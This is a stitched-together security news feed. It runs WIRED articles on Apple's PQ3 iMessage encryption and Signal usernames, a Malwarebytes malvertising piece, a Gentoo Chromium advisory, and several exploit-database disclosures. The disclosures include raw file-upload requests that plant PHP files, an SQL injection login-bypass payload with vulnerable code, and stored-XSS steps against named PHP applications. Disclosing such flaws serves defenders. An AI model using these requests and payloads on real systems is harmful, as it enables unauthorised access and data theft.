Useful quantum computers aren’t a reality—yet. But in one of the biggest deployments of post-quantum encryption so far, Apple is bringing the technology to iMessage.

Apple is launching its first post-quantum protections, one of the biggest deployments of the future-resistant encryption technology to date.

Billions of medical records, financial transactions, and messages we send to each other are protected by encryption. It’s fundamental to keeping modern life and the global economy running relatively smoothly. However, the decades-long race to create vastly powerful quantum computers, which could easily crack current encryption, creates new risks.

While practical quantum computing technology may still be years or decades away, security officials, tech companies, and governments are ramping up their efforts to start using a new generation of post-quantum cryptography. These new encryption algorithms will, in short, protect our current systems against any potential quantum computing-based attacks.

Today Cupertino is announcing that PQ3—its post-quantum cryptographic protocol—will be included in iMessage. The update will launch in iOS and iPad OS 17.4 and macOS 14.4 after previously being deployed in the beta versions of the software. Apple, which published the news on its security research blog, says the change is the “most significant cryptographic security upgrade in iMessage history.”

“We rebuilt the iMessage cryptographic protocol from the ground up,” its blog post says, adding that the upgrade will fully replace its existing encryption protocols by the end of this year. You don’t need to do anything other than update your operating system for the new protections to be applied.

Quantum computing is serious business. Governments in the US, China, and Russia as well as tech companies such as Google, Amazon, and IBM are plowing billions into the (still) relatively nascent efforts to create quantum computers. If successful, the technologies could help unlock scientific breakthroughs in everything from drug design to creating longer-lasting batteries. Politicians are also vying to become quantum superpowers. The current quantum computing devices are still experimental and not practical for general use.

Unlike the computers we use today, quantum computers use qubits, which can exist in more than one state. (Current bits are either ones or zeroes). It means that quantum devices can store more information than traditional computers and perform more complex calculations, including potentially cracking encryption.

“Quantum computers, if deployed reliably and in a scalable manner, would have the potential to break most of today’s cryptography,” says Lukasz Olejnik, an independent cybersecurity and privacy researcher and consultant. This includes the encryption in the messaging apps that billions of people use every day. Most encrypted messaging apps using public key cryptography have used RSA, Elliptic Curve, or Diffie-Hellman algorithms.

Responding to the potential threat—which has been known about since the 1990s—intelligence and security agencies have become increasingly vocal about developing and deploying quantum-resistant cryptography. The National Institute of Standards and Technology in the US has been a driving force behind the creation of these new encryption types. Olejnik says tech companies are taking the quantum threat “very” seriously. “Much more serious than some older changes like switches between hash functions,” Olejnik says, adding that things are moving relatively fast given that post-quantum cryptography is still “very young” and there’s “no functional quantum computer on the horizon.”

Apple’s rollout of PQ3 in iMessage follows Signal in introducing post-quantum algorithms—the encrypted messaging app introduced its PQXDH specification in September, saying it is built on the Kyber algorithm. Proton, the creator of encrypted email and other apps, said around the same time that it is building quantum-safe PGP encryption for everyone to use.

In its blog post, Apple details how PQ3 has been built and how it operates. The company says PQ3 creates a new post-quantum encryption key as part of the public keys that phones and computers using iMessage create and transmit to Apple’s servers. The company is using the Kyber algorithm—the same approach as Signal—to do this and will generate the keys from the first message that is sent, even if the person receiving the message is offline.

Apple says its setup will apply its post-quantum protections to the creation of encryption keys and the exchange of messages, including if someone’s encryption key has been compromised by an attacker. “To best protect end-to-end encrypted messaging, the post-quantum keys need to change on an ongoing basis to place an upper bound on how much of a conversation can be exposed by any single, point-in-time key compromise—both now and with future quantum computers,” the company says in its blog post.

The post-quantum protections are an addition to its existing encryption, Apple says. It is using a “hybrid design” that combines its current elliptic curve cryptography (ECC) with the newer post-quantum protections. “Defeating PQ3 security requires defeating both the existing, classical ECC cryptography and the new post-quantum primitives,” Apple writes.

Apple says PQ3 has been externally assessed by a third-party security company, which it has not named, and also two groups of academics who have written papers analyzing the system. The company argues that its approach—as it is able to issue new quantum keys—has stronger protections than Signal’s current deployment. “We conclude that this protocol achieves strong security guarantees against an active network adversary who can selectively compromise parties and has quantum computing capabilities,” a research paper led by David Basin, a computer science professor at ETH Zurich, says of PQ3.

While there’s no guarantee that quantum technologies will ever develop enough to become useful, it’s likely that the next few years will see a steady drip of companies deploying and enhancing their post-quantum protocols. In part, this is to combat one of the biggest current fears around quantum computing: that countries and threat actors are gathering and hoarding encrypted data today with the plan to unlock its secrets if quantum technologies evolve.

Starting to deploy post-quantum encryption now—before functional quantum computers exist—has the potential to limit the impact of these so-called “harvest now, decrypt later” attacks. “We are seeing our adversaries do this—copying down our encrypted data and just holding on to it,” Dustin Moody, who leads post-quantum encryption standards in the US told _The New Yorker_ in 2022. “It’s definitely a real threat.”

Apple iOS 17.4: iMessage Gets Post-Quantum Encryption in New Update

We tested the end-to-end encrypted messenger’s new feature aimed at addressing critics’ most persistent complaint. Here’s how it works.

For nearly a decade, cybersecurity professionals and privacy advocates have recommended the end-to-end encrypted communications app Signal as the gold standard for truly private digital communications. Using it, however, has paradoxically required exposing one particular piece of private information to everyone you text or call: a phone number. Now, that's finally changing.

Today, Signal launched the rollout in beta of a long-awaited set of features it's describing simply as “phone number privacy.” Those features, which WIRED has tested, are designed to allow users to conceal their phone numbers as they communicate on the app and instead share a username as a less-sensitive method of connecting with one another. Rather than give your phone number to other Signal contacts as the identifier they use to begin a conversation with you, in other words, you can now choose to be discoverable via a chosen handle—or even to prevent anyone who does have your phone number from finding you on Signal.

You’ll now be able to set a unique username as a way for people to find you on Signal in addition to—or instead of—your phone number.

Courtesy of Signal

The use of phone numbers has long been perhaps the most persistent criticism of Signal's design. These new privacy protections finally offer a fix, says Meredith Whittaker, Signal's president. “We want to build a communications app that everyone in the world can easily use to connect with anyone else _privately_. That ‘privately’ is really in bold, underlined, in italics,” Whittaker tells WIRED. “So we're extremely sympathetic to people who might be using Signal in high-risk environments who say, 'The phone number is really sensitive information, and I don't feel comfortable having that disseminated broadly.'”

In the new features—which are available in beta now, but which Signal plans to roll out in a more final version in the coming weeks—Signal has made three changes, one setting that's now switched on by default and two that are opt-in features. First, by default, your phone number will no longer be visible in your Signal profile unless someone already has the number saved in their phone's address book. Second, you can now choose to create and share a unique username, or a QR code that contains it, with anyone you want to connect with. Mine, for instance, is Andy.01. (Once someone does start messaging you, a little confusingly, they'll see your chosen profile name instead of that username. That profile name, just as before in Signal, doesn't have to be unique, and the person you're interacting with can also change it in their own view of you in the app.)

New settings in Signal allow you to change both the visibility and discoverability of your phone number. Your number’s visibility will be turned off by default. Turning off its discoverability, a more drastic measure, will be left as an opt-in setting for higher risk users.

Courtesy of Signal

The third new feature, which is not enabled by default and which Signal recommends mainly for high-risk users, allows you to turn off not just your number's visibility but its discoverability. That means no one can find you in Signal unless they have your username, even if they already know your number or have it saved in their address book. That extra safeguard might be important if you don't want anyone to be able to tie your Signal profile to your phone number, but it will also make it significantly harder for people who know you to find you on Signal.

The new phone number protections should now make it possible to use Signal to communicate with untrusted people in ways that would have previously presented serious privacy risks. A reporter can now post a Signal username on a social media profile to allow sources to send encrypted tips, for instance, without also sharing a number that allows strangers to call their cell phone in the middle of the night. An activist can discreetly join an organizing group without broadcasting their personal number to people in the group they don't know.

In the past, using Signal without exposing a private number in either of those situations would have required setting up a new Signal number on a burner phone—a difficult privacy challenge for people in many countries that require identification to buy a SIM card—or with a service like Google Voice. Now you can simply set a username instead, which can be changed or deleted at any time. (Any conversations you've started with the old username will switch over to the new one.) To avoid storing even those usernames, Signal is also using a cryptographic function called a Ristretto hash, which allows it to instead store a list of unique strings of characters that encode those handles.

Amid these new features designed to calibrate exactly who can learn your phone number, however, one key role for that number hasn't changed: There's still no way to avoid sharing your phone number with Signal itself when you register. The fact that this requirement persists even after Signal's upgrade will no doubt rankle some critics who have pushed Signal's developers to better cater to users seeking more complete anonymity, such that even Signal's own staff can't see a phone number that might identify users or hand that number over to a surveillance agency wielding a court order.

Whittaker says that, for better or worse, a phone number remains a necessary requisite as the identifier Signal privately collects from its users. That's partly because it prevents spammers from creating endless accounts since phone numbers are scarce. Phone numbers are also what allow anyone to install Signal and have it immediately populate with contacts from their address book, a key element of its usability.

In fact, designing a system that prevents spam accounts and imports the user's address book _without_ requiring a phone number is “a deceptively hard problem,” says Whittaker. “Spam prevention and actually being able to connect with your social graph on a communications app—those are existential concerns,” she says. “That's the reason that you still need a phone number to register, because we still need a thing that does that work.”

The continued phone number requirement means Signal's privacy upgrade is a compromise, says Matthew Green, a professor of cryptography and computer science at Johns Hopkins University who has in the past consulted for both Google and Facebook in their implementation of Signal's open source encryption protocol. “It's a half solution,” says Green. “It's not a perfect solution.”

Green notes, however, that even if it doesn't satisfy the most die-hard privacy advocates, it represents a significant improvement for a much larger portion of Signal's hundreds of millions of users. “There’s a legitimate community of people who wanted to use Signal without giving other people their phone numbers, and they’re going to be very happy with this change. And then there's a more hardcore set of people who don’t want to ever give their number to Signal,” Green says. “I think getting a big set of people serviced is the right direction, and working on satisfying all the other people is something for Signal to keep working on.”

Signal doesn't currently have any road map toward dropping its use of phone numbers as a registration mechanism, Whittaker concedes—she says for now, there's no alternative that wouldn't sacrifice Signal's usability, which she argues would represent a net loss for privacy advocates. But she says that the new phone number privacy features are nonetheless Signal's careful attempt to solve the problem phone numbers represent without losing the qualities that have made Signal popular in the first place.

“It's really about staying true to our principles,” Whittaker says. “In more and more ways—in better and better ways—to fill that promise of easy, usable, private communications.”

_Correction: 2/20/24, 1:25 pm EST: Meredith Whittaker's professional title is president of the Signal Foundation._

Signal Finally Rolls Out Usernames, So You Can Keep Your Phone Number Private

Petrol Pump Management Software version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated)  
# Google Dork: N/A  
# Application: Petrol pump management software  
# Date: 20.02.2024  
# Bugs: File Upload Remote Code Execution (RCE) (unauthenticated)  
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload   
files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder.   
This allows malicious individuals to execute unauthorized commands on the system.

## Staus: HIGH-CRITICAL Vulnerability

## Proof of Concept (PoC):

Video:  
https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view

// File upload Request

POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/zer/fuelflow/admin/web.php  
Cookie: PHPSESSID=1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="id"

1  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photo1_img"

test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photo1"; filename="3.php"  
Content-Type: image/png

<?php phpinfo();?>  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="title"

FuelFlow lite - Developed by Mayuri K. tessss  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photos_img"

test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photos"; filename=""  
Content-Type: application/octet-stream

-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="sitekey"

test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="secretkey"

test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="update"

-----------------------------82750242321210078514140255085--

//  Phpinfo file locaton 

/zerday/fuelflow/assets/images/65d45a6080eca.php

Petrol Pump Management Software 1.0 Shell Upload

Tourism Management System version 2.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload# Google Dork: N/A# Exploit Author: SoSPiro# Date: 2024-02-18# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/tourism-management-system-free-download/# Version: 2.0# Tested on: Windows 10 Pro# Impact: Allows admin to upload all files to the web server# CVE : N/A# Exploit Description:The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.# PoC requestPOST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201Content-Length: 361Origin: http://localhostConnection: closeReferer: http://localhost/zer/tms/admin/change-image.php?imgid=1Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhvUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1X-PwnFox-Color: red-----------------------------390927495111779706051786831201Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"Content-Type: text/plain<?php phpinfo();?>-----------------------------390927495111779706051786831201Content-Disposition: form-data; name="submit"-----------------------------390927495111779706051786831201--===========================================================================================- Response -HTTP/1.1 200 OKDate: Sun, 18 Feb 2024 04:33:37 GMTServer: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-devX-Powered-By: PHP/8.1.13Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 8146============================================================================================- File location -http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php

Tourism Management System 2.0 Shell Upload

Google Cloud Run is currently being abused in high-volume malware distribution campaigns, spreading several banking trojans such as Astaroth (aka Guildma), Mekotio and Ousaban to targets across Latin America and Europe.
The volume of emails associated with these campaigns has significantly increased since September 2023 and we continue to regularly

Astaroth, Mekotio & Ousaban abusing Google Cloud Run in LATAM-focused malware campaigns

Malvertising made a resurgence in 2023, with cybercriminals creating malicious ads and websites imitating Amazon, TradingView, and Rufus.

On the internet, people need to worry about more than just opening suspicious email attachments or entering their sensitive information into harmful websites—they also need to worry about their Google searches.

That’s because last year, as revealed in our 2024 ThreatDown State of Malware report, cybercriminals flocked to a malware _delivery_ method that doesn’t require they know a victim’s email address, login credentials, personal information, or, anything, really.

Instead, cybercriminals just need to fool someone into clicking on a search result that looks remarkably legitimate.

This is the work of “malicious advertising,” or “malvertising,” for short. Malvertising is not malware itself. Instead, it’s a sneaky process of placing malware, viruses, or other cyber infections on a person’s computer, tablet, or smart phone. The malware that eventually slips onto a person’s device comes in many varieties, but cybercriminals tend to favor malware that can steal a person’s login credentials and information. With this newly stolen information, cybercriminals can then pry into sensitive online accounts that belong to the victim.

But before any of that digital theft can occur, cybercriminals must first ensnare a victim, and they do this by abusing the digital ad infrastructure underpinning Google search results.

Think about searching on Google for “running shoes”—you’ll likely see ads for Nike and Adidas. A Google search for “best carry-on luggage” will invariably produce ads for the consumer brands Monos and Away. And a Google search for a brand like Amazon will show, as expected, ads for Amazon.

But cybercriminals know this, and in response, they’ve created ads that _look_ legitimate, but instead direct victims to malicious websites that carry malware. The websites themselves, too, bear a striking resemblance to whatever product or brand they’re imitating, so as to maintain a charade of legitimacy. From these websites, users download what they think is a valid piece of software, instead downloading malware that leaves them open to further attacks.

_A malicious ad for the KeePass password manager appears as a legitimate ad._

__The real KeePass website (left) side-by-side with a malvertising site (right)__.

It’s true that malvertising is often understood as a risk to businesses, but the copycat websites that are created by cybercriminals can and often do impersonate popular brands for everyday users, too.

As revealed in our 2024 ThreatDown State of Malware report, the five most impersonated brands for malvertising last year included:

1.  Amazon
2.  Rufus
3.  Weebly
4.  NotePad++
5.  TradingView

These five brands may not all carry the same familiarity, but their products and services capture a broad swath of user interest, from Weebly’s website creation products, to TradingView’s investment trading platform, to Rufus’s niche-but-useful portable OS booting tool.

****Why the increase in malvertising last year?****

If Google ads have been around for more than a decade, why are they only being abused by cybercriminals now? The truth is, malvertising has been around for years, but a particular resurgence was recorded more recently.

In 2022, cybercriminals lost access to one of their favorite methods of delivering malware.

That summer, Microsoft announced that it would finally block “macros” that were embedded into files that were downloaded from the internet. Macros are essentially instructions that users can program so that multiple tasks can be bundled together. The danger, though, is that cybercriminals would pre-program macros within certain files for Microsoft Word, Excel, or PowerPoint, and then send those files as malicious email attachments. Once those attachments were downloaded and opened by users, the embedded macros would trigger a set of instructions directing a person’s computer to install malware from a dangerous website online.

Macros were a scourge for cybersecurity for years, as they were effective and easy to deliver.

But when Microsoft restricted macro capabilities in 2022, cybercriminals needed to find another malware delivery channel. They focused on malvertising.

Today’s malvertising is increasingly sophisticated, as cybercriminals can create and purchase online ads that target specific types of users based on location and demographics. Concerningly, modern malvertising can even avoid basic fraud detection as cybercriminals can create websites that determine whether a user is a real person or simply a bot that is trawling the web to find and flag malicious activity.

****How to protect against malvertising****

The threat of malvertising is multi-layered: There are the fraudulent ads that cybercriminals place on Google search results, the malicious websites that imitate legitimate brands and companies to convince users to download malware, and the malware infection itself.

As such, any successful defense strategy must be multi-layered.

For safe browsing, people can rely on Malwarebytes Browser Guard, a browser extension that blocks third-party tracking and flags malicious websites known to be in the control of cybercriminals. As we wrote before:

> “Malwarebytes Browser Guard provides additional protection to standard ad-blocking features by covering a larger area of the attack chain all the way to domains controlled by attackers. Thanks to its built-in heuristic engine it can also proactively block never-before-seen malicious websites.”

The problem with malvertising, though, is that new malicious websites are created every single day. Cybersecurity defenders, then, are often caught in a game of catch-up.

Here, users can find safety from Malwarebytes Premium, which provides real-time protection to detect and stop any cyberthreats that get installed onto a device, even if those threats are masquerading as legitimate apps or software.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Malvertising: This cyberthreat isn’t on the dark web, it’s on Google 

InstantCMS version 2.16.1 suffers from a persistent cross site scripting vulnerability that appears to require administrative access.

    # Exploit Title: InstantCMS - Store XSS# Application: InstantCMS # Version: v2.16.1   # Bugs: Stored XSS# Technology: PHP# Vendor Homepage: https://instantcms.ru/# Software Link: https://instantcms.ru/get# Date: 14.09.2023# Author: SoSPiro# Tested on: Windows## DescriptionI noticed that you filtered the filter very carefully. But there are still some parts you missed## POC1 . Login with admin2 . Go to "http://localhost/o2/admin/menu/item_edit/18"3 . Insert payload in CSS class4 . Click save , and go to home page, and Detect store xss in footerhttps://drive.google.com/file/d/1_9QGoBnbZZrsHUgNkujja1Ptj3f8fl2W/view?usp=sharing## ImpactThis security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...## Bug fix commithttps://github.com/instantsoft/icms2/commit/b2172a0f842fc28966b00bab3e2e9094c6bfd156## Referencehttps://huntr.com/bounties/18546c85-de6a-4252-a02f-c9d26f4f775e/

InstantCMS 2.16.1 Cross Site Scripting

Gentoo Linux Security Advisory 202402-23 - Multiple vulnerabilities have been discovered in Chromium and its derivatives, the worst of which can lead to remote code execution. Versions greater than or equal to 121.0.6167.139 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-23  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Chromium, Google Chrome, Microsoft Edge: Multiple Vulnerabilities  
     Date: February 19, 2024  
     Bugs: #922062, #922340, #922903, #923370  
       ID: 202402-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Chromium and its  
derivatives, the worst of which can lead to remote code execution.

Background  
==========

Chromium is an open-source browser project that aims to build a safer,  
faster, and more stable way for all users to experience the web. Google  
Chrome is one fast, simple, and secure browser for all your devices.  
Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
=================

Package                    Vulnerable        Unaffected  
-------------------------  ----------------  -----------------  
www-client/chromium        < 121.0.6167.139  >= 121.0.6167.139  
www-client/google-chrome   < 121.0.6167.139  >= 121.0.6167.139  
www-client/microsoft-edge  < 121.0.2277.83   >= 121.0.2277.83

Description  
===========

Multiple vulnerabilities have been discovered in Chromium and its  
derivatives. Please review the CVE identifiers referenced below for  
details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Google Chrome users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/google-chrome-121.0.6167.139"

All Chromium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/chromium-121.0.6167.139"

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-121.0.2277.83"

References  
==========

[ 1 ] CVE-2024-0333  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0333  
[ 2 ] CVE-2024-0517  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0517  
[ 3 ] CVE-2024-0518  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0518  
[ 4 ] CVE-2024-0519  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0519  
[ 5 ] CVE-2024-0804  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0804  
[ 6 ] CVE-2024-0805  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0805  
[ 7 ] CVE-2024-0806  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0806  
[ 8 ] CVE-2024-0807  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0807  
[ 9 ] CVE-2024-0808  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0808  
[ 10 ] CVE-2024-0809  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0809  
[ 11 ] CVE-2024-0810  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0810  
[ 12 ] CVE-2024-0811  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0811  
[ 13 ] CVE-2024-0812  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0812  
[ 14 ] CVE-2024-0813  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0813  
[ 15 ] CVE-2024-0814  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0814  
[ 16 ] CVE-2024-1059  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1059  
[ 17 ] CVE-2024-1060  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1060  
[ 18 ] CVE-2024-1077  
      https://nvd.nist.gov/vuln/detail/CVE-2024-1077

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-23

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-23

Employee Management System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

# Exploit Title: Employee Management System - SQL Injection  
# Google Dork: N/A  
# Application: Employee Management System   
# Date: 19.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html  
# Version: N/A  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information.

## Proof of Concept (PoC):

An example attacker could input the following into the email field instead of a valid email address:

In this case, the SQL query would look like:

SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active'  
As "1=1" is always true, the query would return positive results, allowing the attacker to log in.

## Vulnerable code section:  
====================================================  
employee/Admin/login.php

<?php  
session_start();  
error_reporting(1);  
include('../connect.php');

//Get website details  
$sql_website = "select * from website_setting";   
$result_website = $conn->query($sql_website);  
$row_website = mysqli_fetch_array($result_website);

if(isset($_POST['btnlogin'])){

//Get Date  
date_default_timezone_set('Africa/Lagos');  
$current_date = date('Y-m-d h:i:s');

$email = $_POST['txtemail'];  
$password = $_POST['txtpassword'];  
$status = 'Active';

 $sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."'  and status = '".$status."'";  
  $result = mysqli_query($conn, $sql);

if (mysqli_num_rows($result) > 0) {  
  // output data of each row  
 ($row = mysqli_fetch_assoc($result));  
   $_SESSION["email"] = $row['email'];  
   $_SESSION["password"] = $row['password'];  
 $_SESSION["phone"] = $row['phone'];  
    $firstname = $row['firstname'];  
     $_SESSION["firstname"] = $row['firstname'];

     $fa = $row['2FA'];

  }

Employee Management System 1.0 SQL Injection

The Android banking trojan known as Anatsa has expanded its focus to include Slovakia, Slovenia, and Czechia as part of a new campaign observed in November 2023.
"Some of the droppers in the campaign successfully exploited the accessibility service, despite Google Play's enhanced detection and protection mechanisms," ThreatFabric said in a report shared with The Hacker News.

Tag

#google